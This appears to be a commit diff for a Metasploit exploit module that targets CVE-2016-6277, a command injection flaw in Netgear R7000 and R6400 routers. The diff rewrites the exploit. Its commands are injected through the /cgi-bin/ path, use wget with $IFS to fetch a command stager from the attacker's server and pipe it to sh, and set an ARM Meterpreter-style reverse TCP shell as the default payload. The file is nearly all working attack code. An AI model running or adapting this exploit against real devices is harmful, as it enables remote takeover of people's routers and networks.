commit
fbf7f55485
|
@ -6,9 +6,11 @@
|
|||
require 'msf/core'
|
||||
|
||||
class MetasploitModule < Msf::Exploit::Remote
|
||||
|
||||
Rank = ExcellentRanking
|
||||
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
include Msf::Exploit::CmdStager
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
|
@ -18,11 +20,11 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
Netgear R7000 and R6400 router firmware version 1.0.7.2_1.1.93 and possibly earlier.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Platform' => 'unix',
|
||||
'Platform' => 'linux',
|
||||
'Author' => ['thecarterb', 'Acew0rm'],
|
||||
'DefaultTarget' => 0,
|
||||
'Privileged' => false,
|
||||
'Arch' => [ARCH_CMD],
|
||||
'Privileged' => true,
|
||||
'Arch' => ARCH_ARMLE,
|
||||
'Targets' => [
|
||||
[ 'Automatic Target', { } ]
|
||||
],
|
||||
|
@ -35,20 +37,19 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
[ 'CVE', '2016-6277']
|
||||
],
|
||||
'DisclosureDate' => 'Dec 06 2016',
|
||||
'Payload' =>
|
||||
'DefaultOptions' =>
|
||||
{
|
||||
'Space' => 1024,
|
||||
'DisableNops' => true,
|
||||
'BadChars' => "\x20"
|
||||
},
|
||||
'DefaultOptions' => { 'WfsDelay' => 10}
|
||||
'PAYLOAD' => 'linux/armle/mettle_reverse_tcp'
|
||||
}
|
||||
))
|
||||
|
||||
register_options(
|
||||
[
|
||||
Opt::RPORT(80)
|
||||
], self.class)
|
||||
end
|
||||
|
||||
deregister_options('URIPATH')
|
||||
end
|
||||
|
||||
def scrape(text, start_trig, end_trig)
|
||||
text[/#{start_trig}(.*?)#{end_trig}/m, 1]
|
||||
|
@ -80,24 +81,29 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
end
|
||||
|
||||
def exploit
|
||||
check
|
||||
return if check == CheckCode::Safe
|
||||
|
||||
pe = payload.encoded
|
||||
pe.to_s
|
||||
pe.gsub!('{','')
|
||||
pe.gsub!('}','')
|
||||
|
||||
#cmd = payload.encoded.unpack("C*").map{|c| "\\x%.2x" % c}.join
|
||||
#str = "echo$IFS-ne$IFS\"#{cmd}\"|/bin/sh&"
|
||||
|
||||
print_status('Sending encoded command...')
|
||||
vprint_status("Encoded command: #{pe}")
|
||||
send_request_cgi({
|
||||
'uri' => "/cgi-bin/;#{pe}",
|
||||
'method' => 'GET'
|
||||
})
|
||||
|
||||
print_status('Giving the handler time to run...')
|
||||
@cmdstager = generate_cmdstager(flavor: :wget).join(';')
|
||||
|
||||
send_request_cgi(
|
||||
'method' => 'GET',
|
||||
'uri' => "/cgi-bin/;wget$IFS-O-$IFS'#{srvhost_addr}:#{srvport}'|sh"
|
||||
)
|
||||
end
|
||||
|
||||
# Return CmdStager on first request, payload on second
|
||||
def on_request_uri(cli, request)
|
||||
if @cmdstager
|
||||
send_response(cli, @cmdstager)
|
||||
@cmdstager = nil
|
||||
else
|
||||
super
|
||||
end
|
||||
end
|
||||
|
||||
# XXX: This is the only way to force this resource
|
||||
def resource_uri
|
||||
'/'
|
||||
end
|
||||
|
||||
end
|
||||
|
|
Loading…
Reference in New Issue